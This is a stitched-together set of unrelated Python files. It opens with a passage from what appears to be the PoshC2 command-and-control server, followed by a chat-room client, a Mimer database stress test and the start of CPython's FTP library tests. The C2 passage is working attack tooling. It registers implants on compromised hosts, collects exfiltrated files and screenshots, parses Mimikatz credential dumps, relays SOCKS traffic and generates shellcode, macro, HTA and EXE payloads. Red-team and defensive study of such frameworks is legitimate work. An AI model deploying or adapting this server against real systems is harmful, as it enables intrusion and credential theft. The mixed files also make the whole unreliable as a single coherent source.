User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
else:
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
HTTPResponsePage = select_item("HTTPResponse", "C2Server")
if HTTPResponsePage:
s.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
s.wfile.write(bytes(HTTPResponse, "utf-8"))
def do_POST(s):
"""Respond to a POST request."""
try:
s.server_version = ServerHeader
s.sys_version = ""
try:
content_length = int(s.headers['Content-Length'])
except:
content_length = 0
s.cookieHeader = s.headers.get('Cookie')
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
except:
cookieVal = ""
post_data = s.rfile.read(content_length)
logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data)
            now = datetime.datetime.now()
result = get_implants_all()
for i in result:
implantID = i[0]
RandomURI = i[1]
Hostname = i[3]
encKey = i[5]
Domain = i[11]
User = i[2]
if RandomURI in s.path and cookieVal:
update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
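                    # e.g. taskId "7" becomes the zero-padded label "00007" used in the console output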
executedCmd = get_cmd_from_task_id(taskId)
task_owner = get_task_owner(taskId)
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if "loadmodule" in executedCmd:
print("Module loaded successfully")
update_task(taskId, "Module loaded successfully")
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
if (chunkNumber == "00001") and os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename)):
counter = 1
while(os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%sdownloads/%s' % (ROOTDIR, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%sdownloads/%s' % (ROOTDIR, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]"):
update_task(taskId, rawoutput)
print(rawoutput)
else:
dumppath = "%sSafetyDump-Task-%s.bin" % (DownloadsDirectory, taskIdStr)
open(dumppath, 'wb').write(base64.b64decode(rawoutput))
message = "Dump written to: %s" % dumppath
update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or executedCmd.lower().startswith("invoke-mimikatz") or executedCmd.lower().startswith("pbind-command")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
process_mimikatz(outputParsed)
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
except Exception as e:
print(Colours.RED + "Unknown error!" + Colours.END)
print(e)
traceback.print_exc()
finally:
try:
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
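# If the request path matches one of the SharpSocks URLs, proxy the POST body through to the local SharpSocks server and relay its response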
if [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("[+] Making POST connection to SharpSocks %s%s\r\n" % (SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Cookie': '%s' % s.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'})
res = urlopen(r, post_data)
sharpout = res.read()
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except URLError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] URLError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except HTTPError as e:
try:
s.send_response(res.getcode())
except:
s.send_response(500)
s.send_header("Content-type", "text/html")
try:
s.send_header("Content-Length", len(sharpout))
except:
s.send_header("Content-Length", 0)
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] HTTPError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
s.send_response(res.getcode())
s.send_header("Content-type", "text/html")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(default_response())
except Exception as e:
print(Colours.RED + "Generic error in POST request!" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
print(e)
traceback.print_exc()
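# Serve each HTTP request in a separate thread; daemon threads will not keep the process alive on shutdown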
ThreadingMixIn.daemon_threads = True
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def log_c2_messages():
while True:
messages = get_c2_messages()
if messages is not None:
for message in messages:
print(message)
time.sleep(2)
if __name__ == '__main__':
httpd = ThreadedHTTPServer((HOST_NAME, PORT_NUMBER), MyHandler)
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN + logopic)
print(Colours.END + "")
if os.path.isfile(Database):
print("Using existing database / project" + Colours.GREEN)
C2 = get_c2server_all()
if ((C2[1] == HostnameIP) and (C2[3] == DomainFrontHeader)):
qstart = "%squickstart.txt" % (ROOTDIR)
if os.path.exists(qstart):
with open(qstart, 'r') as f:
print(f.read())
else:
print("Error different IP so regenerating payloads")
if os.path.exists("%spayloads_old" % ROOTDIR):
import shutil
shutil.rmtree("%spayloads_old" % ROOTDIR)
os.rename("%spayloads" % ROOTDIR, "%spayloads_old" % ROOTDIR)
os.makedirs("%spayloads" % ROOTDIR)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], HostnameIP, DomainFrontHeader, C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("updated_host", HostnameIP, C2[3], "", "", "", "")
update_item("HostnameIP", "C2Server", HostnameIP)
update_item("QuickCommand", "C2Server", QuickCommand)
update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
newPayload.CreatePython()
newPayload.WriteQuickstart(ROOTDIR + 'quickstart.txt')
else:
print("Initializing new project folder and database" + Colours.GREEN)
print("")
directory = os.path.dirname(ROOTDIR)
if not os.path.exists(directory):
os.makedirs(directory)
os.makedirs("%s/downloads" % directory)
os.makedirs("%s/reports" % directory)
os.makedirs("%s/payloads" % directory)
initializedb()
if not validate_sleep_time(DefaultSleep):
print(Colours.RED)
print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
sys.exit(1)
setupserver(HostnameIP, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, HTTPResponse, ROOTDIR, ServerPort, QuickCommand, DownloadURI, "", "", "", Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken, APIUser, EnableNotifications)
rewriteFile = "%s/rewrite-rules.txt" % directory
print("Creating Rewrite Rules in: " + rewriteFile)
print("")
rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1"]
rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
with open(rewriteFile, 'w') as outFile:
for line in rewriteFileContents:
outFile.write(line)
outFile.write('\n')
outFile.close()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
new_urldetails("default", C2[1], C2[3], "", "", "", "")
newPayload.CreateRaw()
newPayload.CreateDlls()
newPayload.CreateShellcode()
newPayload.CreateSCT()
newPayload.CreateHTA()
newPayload.CreateCS()
newPayload.CreateMacro()
newPayload.CreateEXE()
newPayload.CreateMsbuild()
create_self_signed_cert(ROOTDIR)
newPayload.CreatePython()
newPayload.WriteQuickstart(directory + '/quickstart.txt')
print("")
print("CONNECT URL: " + select_item("HostnameIP", "C2Server") + get_newimplanturl() + Colours.GREEN)
print("WEBSERVER Log: %swebserver.log" % ROOTDIR)
KEY = get_baseenckey()
print("")
print(time.asctime() + " PoshC2 Server Started - %s:%s" % (HOST_NAME, PORT_NUMBER))
from datetime import date, datetime
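# Work out how many days remain until the configured kill date and warn in red if fewer than eight remain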
killdate = datetime.strptime(C2[5], '%d/%m/%Y').date()
datedifference = number_of_days(date.today(), killdate)
if datedifference < 8:
print (Colours.RED+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
else:
print (Colours.GREEN+("\nKill Date is - %s - expires in %s days" % (C2[5],datedifference)))
print(Colours.END)
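# Wrap the listening socket in TLS using the generated certificate, falling back to TLSv1 if the default protocol version is rejected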
if (os.path.isfile("%sposh.crt" % ROOTDIR)) and (os.path.isfile("%sposh.key" % ROOTDIR)):
try:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLS)
except Exception:
httpd.socket = ssl.wrap_socket(httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
else:
raise ValueError("Cannot find the certificate files")
c2_message_thread = threading.Thread(target=log_c2_messages, daemon=True)
c2_message_thread.start()
try:
httpd.serve_forever()
except (KeyboardInterrupt, EOFError):
httpd.server_close()
print(time.asctime() + " PoshC2 Server Stopped - %s:%s" % (HOST_NAME, PORT_NUMBER))
sys.exit(0)
|
ChatRoom1.0Client.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import os
import time
import threading
import Queue
import sys
import argparse
from multiprocessing import Process
print """\33[91m
═════════════════════════════════════════════════════════
███████ ██████ ███████
█ █ █ █ ║
█ █════╗ █ ╔═█ ║
█═════════════█ ╚█ ║█═══╝
█ ██████ ║█
█ █ █ ╚╗█ ╔═══════Server
█════════╗ █ █ ╚═█ ║
███████ ║ █ █ ███████
Chat Room Client════════╝
═════════════════════════════════════════════════════════
\33[92m"""
quit = Queue.Queue()
path = os.path.realpath(__file__)
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--screen", help="This is used by the script to make a screen. Not necessarily needed for regular users.")
args = parser.parse_args()
def outputscreen(messages, online):
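# Redraw the chat screen: chat messages fill the left-hand column and the online user list is right-aligned, padded to the current terminal width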
rows, columns = os.popen('stty size', 'r').read().split()
rows = int(rows)
rows = rows - 1
columns = int(columns)
if len(messages) > rows:
messages = messages[len(messages) - rows:]
print messages
else:
pass
if len(online) > rows:
online = online[len(online) - rows:]
print online
else:
pass
output = []
for line in range(rows):
output.append(["", ""])
tick = 0
for message in messages:
output[tick][0] = message
tick = tick + 1
print tick
if len(output) <= len(online):
print "less or equal output then online"
for l in range(len(online) - len(output)):
output.append(["", ""])
print output
#for num in range(len(online)):
tick = 0
print output
for user in online:
output[tick][1] = user
tick = tick + 1
print output
else:
print "more output then online"
print rows
#for num in range(len(output)):
tick = 0
for user in online:
output[tick][1] = user
tick = tick + 1
for line in output:
space = int(columns)
outleng = len(line[0]) + len(line[1])
space = space - outleng
print line[0] + " "*space + line[1]
if args.screen:
sp = args.screen
sp = sp.split(":")
user = sp[2]
port = int(sp[1])
server = sp[0]
global cv
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (server, port)
sock.connect(server_address)
sock.send("screen:")
#print "\33[96m Type /stop to quit\33[91m"
quit = False
messages = []
import ast
online = sock.recv(1024)
online = ast.literal_eval(online)
tmp = online
while quit == False:
servercom = sock.recv(1024)
#print servercom
if servercom == "quitting:":
quit.put("1")
quit = True
os._exit(0)
elif "online:" in servercom:
online = ast.literal_eval(servercom[7:])
if tmp != online:
for line in tmp:
if line not in online:
messages.append(line + " has left the server...")
else:
pass
for line in online:
if line not in tmp:
messages.append(line + " has joined the server...")
else:
pass
else:
pass
if user not in online:
quit = True
sock.send("quitting:")
os._exit(0)
else:
sock.send("good:")
tmp = online
outputscreen(messages, online)
else:
messages.append(servercom)
outputscreen(messages, online)
time.sleep(.01)
if servercom == "ping":
sock.send("ping:pong")
else:
pass
else:
pass
cv = "1.0"
username = raw_input("Name:")
server = raw_input("Server IP[127.0.0.1]:")
port = raw_input("Server Port[22550]:")
if port == "":
port = "22550"
else:
pass
if server == "":
server = "127.0.0.1"
else:
pass
print port
class connect(object):
def __init__(self, server, port, username, quit):
self.quit = quit
self.server = server
self.port = port
self.username = username
self.con()
def con(self):
#try:
global cv
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (self.server, int(self.port))
self.sock.connect(server_address)
self.sock.settimeout(60)
self.sock.send("cv:" + cv)
compatible = self.sock.recv(1024)
if compatible == "comp:1":
pass
else:
print """\33[91m
***************************************************
Error Server is on version """ + compatible[7:] + """
***************************************************
"""
sys.exit()
self.sock.send("user:" + self.username)
nc = self.sock.recv(1024)
if "error:" in nc:
print """\33[91m
***************************************************
Error while sending username:
""" + nc[6:] + """
***************************************************
"""
os._exit(0)
threading.Thread(target = self.ping, args=()).start()
threading.Thread(target = self.screen, args=()).start()
#self.screen.start()
quit = False
while quit == False:
inp = raw_input(">>")
if inp == "/quit":
quit = True
self.quit.put("1")
self.sock.send("quitting:")
elif "" == inp:
"""\33[91m
***************************************************
Error no message entered
***************************************************
"""
elif "/help" == inp:
"""\33[91m
***************************************************
Error no help menu implemented yet
***************************************************
"""
else:
self.sock.send("mesg:" + inp)
else:
os._exit(0)
'''except:
print """\33[91m
***************************************************
Error while initiating connecting with server
***************************************************
"""
sys.exit()'''
def ping(self):
while True:
self.sock.send("ping:")
time.sleep(1)
def screen(self):
global path
os.system("xterm -e python " + "./ChatRoom1.0Client.py" + " -s " + self.server + ":" + self.port + ":" + self.username)
self.qt = True
self.quit.put("1")
def quitcheck(quit):
while True:
time.sleep(1)
if quit.empty() == True:
pass
else:
os._exit(0)
threading.Thread(target = quitcheck, args=(quit,)).start()
threading.Thread(target=connect, args=(server, port, username, quit)).start()
|
testMonkey.py
|
# Copyright (c) 2017 Mimer Information Technology
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# See license for more details.
import unittest
import time
import math
import mimerpy
import random
import uuid
import threading
from mimerpy.mimPyExceptions import *
import db_config
class TestMonkey(unittest.TestCase):
@classmethod
def setUpClass(self):
(self.syscon, self.tstcon) = db_config.setup()
@classmethod
def tearDownClass(self):
db_config.teardown(tstcon=self.tstcon, syscon=self.syscon)
def setUp(self):
self.tstcon.rollback()
with self.tstcon.cursor() as c:
c.execute("""
create table monkeyTable (c1 INTEGER,
c2 BIGINT,
c3 SMALLINT,
c4 NVARCHAR(256),
c5 BLOB,
c6 NCLOB,
c7 BOOLEAN,
c8 FLOAT) in pybank""")
self.tstcon.commit()
def tearDown(self):
self.tstcon.rollback()
with self.tstcon.cursor() as c:
c.execute("drop table monkeyTable")
self.tstcon.commit()
########################################################################
## Tests below
########################################################################
def test_cursor_dml(self):
cur = self.tstcon.cursor()
for nu in range(0,2000):
apa = random.randint(0,10)
if (apa == 0):
self.cursor_select(cur)
elif (apa == 1):
self.cursor_select_and_fetchone(cur)
elif (apa == 2):
self.cursor_select_and_fetchmany(cur, nu)
elif (apa == 3):
self.cursor_select_and_fetchall(cur)
elif (apa == 4):
self.cursor_insert_executemany(cur)
elif (apa == 5):
self.cursor_insert(cur)
elif (apa == 6):
self.cursor_insert_many(cur)
elif (apa == 7):
try:
self.cursor_next(cur)
except StopIteration:
"""Caught exception"""
elif (apa == 8):
self.cursor_commit(self.tstcon)
elif (apa == 9):
self.cursor_rollback(self.tstcon)
elif (apa == 10):
self.cursor_description_all(cur)
cur.close()
def test_cursor_ddl_and_dml(self):
cur = self.tstcon.cursor()
for nu in range(0,1000):
apa = random.randint(0,15)
if (apa == 0):
try:
self.cursor_select(cur)
except Exception:
""" Ok """
elif (apa == 1):
try:
self.cursor_select_and_fetchone(cur)
except Exception:
""" Ok """
elif (apa == 2):
try:
self.cursor_select_and_fetchmany(cur, nu)
except Exception:
""" Ok """
elif (apa == 3):
try:
self.cursor_select_and_fetchall(cur)
except Exception:
""" Ok """
elif (apa == 4):
try:
self.cursor_insert_executemany(cur)
except Exception:
""" Ok """
elif (apa == 5):
try:
self.cursor_insert(cur)
except Exception:
""" Ok """
elif (apa == 6):
try:
self.cursor_insert_many(cur)
except Exception:
""" Ok """
elif (apa == 7):
try:
self.cursor_next(cur)
except Exception:
"""Caught exception"""
elif (apa == 8):
try:
self.cursor_update(cur)
except Exception:
""" Ok """
elif (apa == 9):
try:
self.monkey_insert(cur)
except Exception:
""" Ok """
elif (apa == 11):
try:
self.monkey_select_and_fetchone(cur)
except Exception:
""" Ok """
elif (apa == 12):
try:
self.cursor_delete(cur)
except Exception:
""" Ok """
elif (apa == 13):
try:
self.cursor_commit(self.tstcon)
except Exception:
""" Ok """
elif (apa == 14):
try:
self.cursor_rollback(self.tstcon)
except Exception:
""" Ok """
elif (apa == 15):
try:
self.cursor_description_all(cur)
except Exception:
""" Ok """
cur.close()
def test_condis(self):
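# Connection stress test: several threads repeatedly open and close connections at random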
def condis(self):
mylist = []
for ac in range(5):
con = mimerpy.connect(**db_config.TSTUSR)
mylist.append([con, True])
for a in range(100):
rand = random.randint(0,4)
if (not mylist[rand][1]):
mylist.pop(rand)
conn = mimerpy.connect(**db_config.TSTUSR)
mylist.append([conn, True])
else:
mylist[rand][0].close()
mylist[rand][1] = False
for ab in mylist:
if (ab[1]):
ab[0].close()
for i in range(9):
t = threading.Thread(target = condis, args = (self,))
t.start()
while (threading.active_count() > 1):
time.sleep(1)
########################################################################
## No Tests below
## Support routines follow
########################################################################
def cursor_insert(self, cur):
a = random.randint(-2**31, 2**31 - 1)
b = random.randint(-2**63, 2**63 - 1)
c = random.randint(-2**15, 2**15 - 1)
d = str(uuid.uuid4())
e = uuid.uuid4().bytes
f = str(uuid.uuid4())
g = random.randint(0,1)
h = random.random()
cur.execute("insert into monkeyTable values (?,?,?,?,?,?,?,?)",[(a),(b),(c),(d),(e),(f),(g),(h)])
def monkey_insert(self, cur):
a = random.randint(-2**100,2**100)
d = str(uuid.uuid4() * random.randint(0,1000))
g = random.randint(0,1)
h = random.random() / 3
cur.execute("insert into monkeyTable values (?,?,?,?,?,?,?,?)",[(a),(a),(a),(d),(d),(d),(d),(h)])
def cursor_select(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
def monkey_select(self, cur):
cul = random.randint(0,10)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
def cursor_select_and_fetchone(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
cur.fetchone()
def monkey_select_and_fetchone(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
laps = random.randint(0,100)
for a in range(laps):
cur.fetchone()
def cursor_select_and_fetchmany(self, cur, numboflaps):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
up = random.randint(0,numboflaps)
cur.fetchmany(up)
def cursor_select_and_fetchall(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
cur.fetchall()
def cursor_insert_executemany(self, cur):
monkeylist = []
for m in range(0,10):
a = random.randint(-2**31, 2**31 - 1)
b = random.randint(-2**63, 2**63 - 1)
c = random.randint(-2**15, 2**15 - 1)
d = str(uuid.uuid4())
e = uuid.uuid4().bytes
f = str(uuid.uuid4())
g = random.randint(0,1)
h = random.random()
monkeylist.append((a,b,c,d,e,f,g,h))
#print("monkeylist ", monkeylist)
cur.executemany("insert into monkeyTable values (?,?,?,?,?,?,?,?)", monkeylist)
def cursor_insert_many(self, cur):
a = random.randint(-2**31, 2**31 - 1)
b = random.randint(-2**63, 2**63 - 1)
c = random.randint(-2**15, 2**15 - 1)
d = str(uuid.uuid4())
e = uuid.uuid4().bytes
f = str(uuid.uuid4())
g = random.randint(0,1)
h = random.random()
for a in range(0,10):
cur.execute("insert into monkeyTable values (?,?,?,?,?,?,?,?)", ((a),(b),(c),(d),(e),(f),(g),(h)))
def cursor_next(self, cur):
cul = random.randint(1,8)
a = "c" + str(cul)
query = "select " + a + " from monkeyTable"
cur.execute(query)
cur.next()
def cursor_update(self, cur):
a = random.randint(-2**31, 2**31 - 1)
cur.execute("update monkeyTable set where c1 = ? where c1 < ?", (a, a))
def cursor_delete(self, cur):
a = random.randint(-2**31, 2**31 - 1)
cur.execute("delete from monkeyTable where c1 = ? where c1 < ?", (a, a))
def cursor_next_StopIteration(self, cur):
cul = random.randint(1,8)
cur.execute("DELETE from monkeyTable")
try:
cur.next()
except StopIteration:
"""Caught Exception"""
def cursor_commit(self, conn):
conn.commit()
def cursor_rollback(self, conn):
conn.rollback()
def cursor_description_all(self,cur):
cul = random.randint(1,8)
cur.execute("select * from monkeyTable")
self.assertEqual(cur.description,(('c1', 50, None, None, None, None, None),
('c2', 52, None, None, None, None, None),
('c3', 48, None, None, None, None, None),
('c4', 63, None, None, None, None, None),
('c5', 57, None, None, None, None, None),
('c6', 59, None, None, None, None, None),
('c7', 42, None, None, None, None, None),
('c8', 56, None, None, None, None, None),))
if __name__ == '__main__':
unittest.TestLoader.sortTestMethodsUsing = None
unittest.main()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import io
import errno
import os
import time
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase
from test import support
from test.support import HOST
threading = support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024).decode('ascii')
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
super(DummyDTPHandler, self).push(what.encode('ascii'))
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
